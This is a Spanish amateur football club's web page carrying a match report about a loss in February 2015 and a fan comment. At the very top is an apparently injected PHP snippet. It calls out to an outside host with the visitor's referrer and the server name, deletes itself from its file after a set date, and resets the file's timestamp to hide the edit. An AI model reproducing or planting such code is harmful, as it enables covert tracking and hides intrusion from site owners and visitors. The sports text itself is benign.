check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Mal resultado, buen juego.

La Afición

Calendario

<<  Octubre 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
        1
  2  3  4  5  6  7  8
  9101112131415
16171819202122
23242526272829
3031     
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Mal resultado, buen juego. PDF Imprimir E-mail
Lunes, 16 de Febrero de 2015 22:36

Llegaba el fin de semana de San Valentín y nosotros iniciábamos la segunda fase de grupos, con un tiempo que no era el mas favorable, con algo de viento y agua y un equipo que se encontraba mermado por las bajas.

Empezó Silos con un dominio claro, pero en una serie de rebotes tras un saque de banda hubo penalti a favor de los visitantes. Adrián Sancho se disponía a pararlo y lo paró con una espectacular estirada pero con la mala suerte de que el rebote cayó en los pies del rival que finalmente consiguió marcar. Aún así Silos siguió dominando y tuvo un mano a mano de Rubén Sancho el cual fue errado por nuestro delantero. Silos pudo empatar pero el arbitro no señaló un posible penalti a favor de Silos por un derribo en el área sobre Carli.

Comenzó la segunda parte y el domino de Silos aumentó, pero una falta en la frontal y un lanzamiento exquisito por parte del rival acabo en la red. Silos remaba a contracorriente y para colmo se lesiono el extremo izquierdo Cule , hubo otro penalti claro sobre Rubén que el arbitro tampoco señaló y para colmo amonesto a nuestro delantero . Luchamos hasta marcar gol y lo conseguimos.

Acorralamos al rival en su campo, llegando a marcar el gol del empate, era legal pero el arbitró lo anuló por fuera de juego. Últimos minutos del partido, nuestro portero subía a rematar una falta, la portería se quedaba vacía, el balón fue despejado por la zaga rival con la mala suerte que el balón cayó en el pie del rival que a puerta vacía consiguió meter el tercero. Seguiremos luchando por este escudo para traer alegrías y victorias.

DEPORTIVO!!!

 

Comentarios  

 
+1 #1 Justo 20-02-2015 10:22
Seguir así que llegarán los resultados y el sábado a ganar un saludo a todos Deportivooooooo ooooooo
Citar
 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.